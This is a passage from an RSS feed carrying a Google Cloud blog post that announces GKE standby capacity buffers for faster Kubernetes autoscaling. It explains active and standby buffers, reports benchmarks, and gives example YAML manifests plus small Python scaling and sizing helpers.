        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="yoa6n"&gt;Under identical traffic loads, the cluster without standby buffers suffered severe latency spikes, with P50, P95, and P99 metrics trapped between 4 and 6 minutes. Conversely, the cluster with standby buffers maintained a P50 latency of just single-digit seconds, while its P95 and P99 metrics briefly peaked at one minute before quickly normalizing to single-digit seconds. Both setups exhibited a similar allocatable core cost, making the buffered approach far more efficient.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;The problem: High costs and latency&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditionally, autoscaling with standard Kubernetes has been effective but slow. Traffic surges or batch jobs require cluster autoscalers to provision fresh nodes, leaving Pods in a pending state while the nodes start. To avoid these delays, you have to resort to workarounds such as lowering your Horizontal Pod Autoscaler (HPA) thresholds or managing so-called balloon pods. These workarounds are costly in both effort and capacity: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Managing balloon pods is operationally complex, requiring manual configuration and ongoing maintenance of priority classes and resource requests to ensure they function correctly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Lowering the HPA threshold adds empty (wasted) space that linearly scales with the size of the node pool.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both GKE active and standby buffers allow capacity to be defined declaratively, removing the need for clunky and operationally heavy workarounds.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition, GKE standby buffers lower infrastructure costs by saving the node’s state to disk and suspending the node, which eliminates compute and memory charges and leaves only persistent disk and IP address costs. Combined with an active buffer, standby buffers give you near-instant pod scheduling with performance similar to over-provisioning, at a fraction of the cost.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=wxsXoBbBHCI"
      data-glue-modal-trigger="uni-modal-wxsXoBbBHCI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/maxresdefault_YqJL5fN.max-1000x1000.jpg);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Introducing GKE Capacity Buffers - the native Kubernetes way to achieve low latency pod scheduling&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-wxsXoBbBHCI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="wxsXoBbBHCI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=wxsXoBbBHCI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Active and standby buffers working together&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All GKE capacity buffers operate on a principle similar to video streaming on platforms like YouTube. By proactively provisioning and managing capacity ahead of impending demand (much like pre-downloading video content), GKE helps ensure that resources are readily available when they’re needed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With today’s launch, the two types of capacity buffers can work in harmony:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Active buffers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Cluster Autoscaler works to reserve enough capacity for a predefined number of pods on existing cluster nodes and, if needed, provisions extra nodes. Select this ready-to-use buffer to provide capacity to your most latency-sensitive workloads. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Standby buffers:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes are pre-provisioned and fully initialized with necessary components like Kubernetes DaemonSets, and given time to &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/configure-capacity-buffer#preload-images"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;preload images&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, but are then suspended, while the underlying compute capacity is released to save costs. When demand spikes, these nodes resume 2-3x faster than creating a fresh node, bridging the gap between cold starts and always-on capacity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The active buffer covers the initial spike until standby buffers resume. The system prioritizes refilling the active buffer from the standby buffer. The standby buffer handles an extended load and protects against slower node cold starts. As standby buffers refill, they initially kick into an active state for a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/configure-capacity-buffer#customize-standby-behavior"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;configurable amount of time&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; before they are suspended, providing a boost of active capacity during sustained traffic loads.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Early benchmarks&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In our tests, using standby buffers enabled us to deliver sub-second &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/machine-learning/agent-sandbox"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Sandbox&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; scheduling latency at up to 90% lower cost than complete overprovisioning.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_GKE_Buffers_Cloud_Metrics.max-1000x1000.jpg"
        
          alt="2 GKE Buffers Cloud Metrics"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimized for business needs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Businesses are under constant pressure to optimize resource consumption while streamlining operations. Recognizing that organizations need smarter tools to manage sporadic and spiky workloads, we worked hard to deliver standby buffers quickly. Now, whether you’re running agents, batch jobs, CI/CD pipelines, game servers, or other bursty workloads, GKE capacity buffers allow you to dynamically balance performance and cost. You can finally define your "insurance policy" against traffic spikes without paying a high premium for it. With GKE standby buffers you can:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Circumvent cold starts:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes suspended by standby buffers resume 2-3x faster than provisioning fresh nodes, reducing pod scheduling latency during traffic spikes and sustained traffic load.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enjoy lower costs:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A standby buffer incurs a fraction of the cost of active capacity because the underlying VM is suspended. You pay for storage and an IP address, rather than for full compute-hours.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Gain declarative control:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Replace complex balloon pod workarounds with the simple, native declarative CapacityBuffers API, explicitly stating how much headroom you need, and letting GKE handle the rest.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unico.max-1000x1000.jpg"
        
          alt="unico"&gt;
        
      
    &lt;/figure&gt;

  





      &lt;p data-block-key="xc99z"&gt;&lt;i&gt;“Using GKE standby capacity buffers has lowered our time-to-ready from several minutes to 30 seconds at a very affordable price.”&lt;/i&gt;&lt;br/&gt; &lt;i&gt;- Pedro Spagiari, Chief Architect at Unico&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ready to improve your performance and save on costs?&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Start by defining a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CapacityBuffer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; resource in your cluster to specify your target buffer size.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Try balancing between standby buffers to reduce pod scheduling latency for sustained loads, and active buffers to address immediate unpredictable capacity needs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s look at an example of how to configure buffers for a Deployment while also using custom ComputeClasses.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Basic setup&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beginning with some basic setup, create a namespace:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;apiVersion: v1
kind: Namespace
metadata:
  name: my-namespace&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Then, create a custom ComputeClass (optional):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;apiVersion: cloud.google.com/v1
kind: ComputeClass
metadata:
  name: my-ccc
  namespace: my-namespace
spec:
  # Buffers will also be created according to these priorities
  priorities:
  - machineFamily: n4
  - machineFamily: n4d
  - machineFamily: c4
  - machineFamily: c4d
  nodePoolAutoCreation:
    enabled: true&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Define the buffer unit size&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can use a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PodTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as a reference for the buffer unit size. You can also create a buffer for a specific Deployment or any object that defines a &lt;/span&gt;&lt;a href="https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#scale-subresource" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;scale subresource&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;# Defines the resource requirements for one unit of buffer.
apiVersion: v1
kind: PodTemplate
metadata:
  name: my-buffer-unit-template
  namespace: my-namespace
template:
  spec:
    terminationGracePeriodSeconds: 0
    tolerations:
      # Optional: Ensures buffer pods can land on any node.
      - key: "node-role.kubernetes.io/master"
        operator: "Exists"
        effect: "NoSchedule"
    containers:
    - name: buffer-container
      image: registry.k8s.io/pause:3.9
      resources:
        requests:
          cpu: "1"
          memory: "1Gi"
        limits:
          cpu: "1"
          memory: "1Gi"
    # Optional: Using buffers with a custom ComputeClass
    # controls the properties of the nodes GKE provisions.
    nodeSelector:
      cloud.google.com/compute-class: my-ccc&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Create buffers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lastly, create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CapacityBuffer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; object that references the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PodTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Here, you create a standby buffer capped at 50 CPUs and 50 GiB of memory:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-standby-buffer-resource-limits
  namespace: my-namespace
  annotations:
    # Optional: Time after which buffer nodes are suspended.
    # Default is 5 minutes.
    buffer.gke.io/standby-capacity-init-time: "5m"
    # Optional: Time after which standby buffers are recreated.
    # Default is 1 day, "never" avoids refreshing.
    buffer.gke.io/standby-capacity-refresh-frequency: "1d"
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The desired state is 50 standby buffer units: each unit is
  # 1 CPU and 1Gi (see the PodTemplate), capped by the limits below.
  # When a standby buffer gets used, a new one gets created.
  limits:
    cpu: "50"
    memory: "50Gi"
  provisioningStrategy: "buffer.gke.io/standby-capacity"&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Optionally, also create an active buffer capped at 5 CPUs and 5 GiB of memory:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-active-buffer-resource-limits
  namespace: my-namespace
spec:
  podTemplateRef:
    name: my-buffer-unit-template
  # The desired state is 5 active buffer units: each unit is
  # 1 CPU and 1Gi (see the PodTemplate), capped by the limits below.
  # When an active buffer gets used, a new one gets created.
  limits:
    cpu: "5"
    memory: "5Gi"
  provisioningStrategy: "buffer.x-k8s.io/active-capacity"&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
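&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The two buffers above take their unit size from a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PodTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. As mentioned earlier, a buffer can instead target a specific Deployment or another object with a scale subresource. The following is a minimal sketch of that variant for illustration only; it is not part of this walkthrough. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;scalableRef&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;percentage&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field names are assumptions based on the upstream CapacityBuffer API, so verify them against the API reference for your GKE version. The buffer name is hypothetical, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;my-deployment&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; refers to the test Deployment created later in this post.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;# Illustrative sketch only; field names below are assumptions to verify.
apiVersion: autoscaling.x-k8s.io/v1beta1
kind: CapacityBuffer
metadata:
  name: my-deployment-buffer  # Hypothetical name.
  namespace: my-namespace
spec:
  # Assumed field: references an object that exposes a scale subresource.
  scalableRef:
    apiGroup: apps
    kind: Deployment
    name: my-deployment
  # Assumed field: buffer size as a percentage of the Deployment's replicas.
  percentage: 20
  provisioningStrategy: "buffer.x-k8s.io/active-capacity"&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;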
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, apply the above objects to your cluster. That’s it!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, any existing and future deployments that can schedule on the capacity reserved by the buffers benefit from lower pod scheduling latency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Test the buffers&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can check on the status of your buffers. In Kubernetes, suspended nodes can be identified by the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Suspended&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; condition.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;kubectl get nodes -o custom-columns='NAME:.metadata.name,SUSPENDED:.status.conditions[?(@.type=="Suspended")].status'&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Expect output similar to the following. Before testing, wait until the standby buffer nodes show as suspended.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&lt;pre&gt;&lt;code&gt;NAME                                             SUSPENDED
gke-my-cluster-nap-n4-standard-8-k960-...-ffbx   False  # Node has been resumed.
gke-my-cluster-nap-n4-standard-4-k960-...-h2x4   &amp;lt;none&amp;gt; # Node was never suspended.
gke-my-cluster-nap-n4d-standard-8-1cip-...-74jf  True   # Node is suspended.&lt;/code&gt;&lt;/pre&gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To test the buffers, create a deployment and scale it.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;pre&gt;&lt;code&gt;apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-deployment
  namespace: my-namespace
spec:
  replicas: 1
  selector:
    matchLabels:
      app: my-deployment
  template:
    metadata:
      labels:
        app: my-deployment
    spec:
      containers:
      - name: busybox
        image: busybox
        command: ["sleep", "inf"]
        resources:
          requests:
            cpu: "500m"
            memory: "500Mi"
      # Optional: using buffers with a custom ComputeClass
      # controls the properties of the nodes GKE provisions.
      nodeSelector:
        cloud.google.com/compute-class: my-ccc&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you scale this deployment to two replicas, the new pods land on the active buffer and are scheduled immediately. The active buffer is then refilled from the standby buffer. At the same time, the standby buffer starts provisioning new nodes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you then scale the deployment to 50 replicas, all of the new pods are scheduled on standby buffer nodes once those nodes resume. New nodes provisioned to refill the standby buffer briefly act as active buffer capacity, which provides a temporary boost. As a result, if you scale the deployment further to 100 replicas during this window, you may notice that new replicas are scheduled immediately.&lt;/span&gt;&lt;/p&gt;
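&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The scaling steps described here (2, then 50, then 100 replicas) could be scripted along the following lines. This is a sketch rather than an official procedure: it assumes the deployment and namespace names from the manifest above, the helper names are hypothetical, and it defaults to a dry run that only prints the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;kubectl scale&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; commands.&lt;/span&gt;&lt;/p&gt;

```python
import subprocess


def scale_command(replicas, deployment="my-deployment", namespace="my-namespace"):
    """Build the kubectl argv that scales the deployment to `replicas`."""
    return [
        "kubectl", "scale", "deployment", deployment,
        "--namespace=" + namespace,
        "--replicas=" + str(replicas),
    ]


def run_scale_steps(steps=(2, 50, 100), dry_run=True):
    """Print (dry run) or execute one scale command per step, in order."""
    commands = [scale_command(replicas) for replicas in steps]
    for argv in commands:
        if dry_run:
            print(" ".join(argv))
        else:
            # Requires kubectl on PATH and credentials for the target cluster.
            subprocess.run(argv, check=True)
    return commands


commands = run_scale_steps()
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a real test you would pause between steps and watch pod scheduling times, since the effects described above depend on when buffer nodes resume.&lt;/span&gt;&lt;/p&gt;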
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE standby buffer best practices&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When working with GKE standby buffers, here are a few things to consider:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Size standby buffers to cover the sustained load you expect, so that they can refill in the background from a cold start. A sufficiently sized standby buffer can reduce your maximum pod scheduling latency to the time it takes to resume a node, around 30 seconds.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;As the buffer is consumed and refilled, new buffer nodes start in an active state before they suspend. This temporarily boosts active capacity during prolonged load.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;If your application requires the lowest possible pod scheduling latency, define an active buffer size that is sufficient to cover any initial spikes you expect to encounter until standby buffer nodes are able to resume. The system prioritizes refilling the active buffer by consuming the standby buffer. A sufficiently sized active buffer and a sufficiently sized standby buffer can help you achieve one-second pod scheduling latency for a fraction of the cost of overprovisioning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Experiment with different buffer sizes to get the best result for your workload.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help you size buffers for your performance targets, we created a simulator, available at &lt;/span&gt;&lt;a href="https://github.com/gke-labs/buffers-simulator" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://github.com/gke-labs/buffers-simulator&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
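&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before running a full simulation, a back-of-the-envelope estimate can give you a starting point. The sketch below is not part of the simulator and is only illustrative: it assumes pods with the 500m CPU and 500Mi memory requests from the test deployment, and a node with a nominal 8 vCPU and 32 GiB. Real allocatable capacity is lower than nominal capacity because part of each node is reserved for system components, so treat the results as a lower bound on node count.&lt;/span&gt;&lt;/p&gt;

```python
import math


def pods_per_node(node_cpu_m, node_mem_mi, pod_cpu_m, pod_mem_mi):
    """How many pods fit on one node, limited by the scarcer of CPU and memory."""
    return min(node_cpu_m // pod_cpu_m, node_mem_mi // pod_mem_mi)


def nodes_needed(replicas, node_cpu_m, node_mem_mi, pod_cpu_m=500, pod_mem_mi=500):
    """Nodes required to hold `replicas` pods with the given resource requests."""
    per_node = pods_per_node(node_cpu_m, node_mem_mi, pod_cpu_m, pod_mem_mi)
    if per_node == 0:
        raise ValueError("a single pod does not fit on this node size")
    return math.ceil(replicas / per_node)


# Assumed node size: 8 vCPU (8000m) and 32 GiB (32768Mi) of nominal capacity.
NODE_CPU_M = 8000
NODE_MEM_MI = 32768

for replicas in (2, 50, 100):
    count = nodes_needed(replicas, NODE_CPU_M, NODE_MEM_MI)
    print(replicas, "replicas need about", count, "node(s)")
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With these assumptions CPU is the limiting resource at 16 pods per node, so a burst to 50 replicas needs about 4 nodes and a burst to 100 replicas about 7.&lt;/span&gt;&lt;/p&gt;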
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Try it yourself!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Active and standby buffers in GKE provide a native solution for low-latency and cost-effective workload scaling by maintaining warm and standby capacity buffers. By circumventing slow node cold starts, buffers help performance-critical applications handle sudden traffic spikes. This feature replaces complex manual workarounds like balloon pods with a simple, declarative API, and allows for fixed, percentage-based, or resource-limited buffering strategies to help maintain strict service-level objectives cost-effectively and without over-provisioning for peak.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Standby buffers are available for GKE clusters running version 1.36.0-gke.2253000 or later. To get started with buffers, check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/capacity-buffer"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</guid><category>GKE</category><category>Containers &amp; Kubernetes</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_blog___Hero_23_2436x1200.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Introducing the GKE standby buffer: Improve node startup times without blowing your budget</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Cloud_blog___Hero_23_2436x1200.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Eyal Yablonka</name><title>Product Manager, Google Kubernetes Engine</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Konrad Kurdej</name><title>Staff Software Engineer, Google Kubernetes Engine</title><department></department><company></company></author></item><item><title>The fully-managed 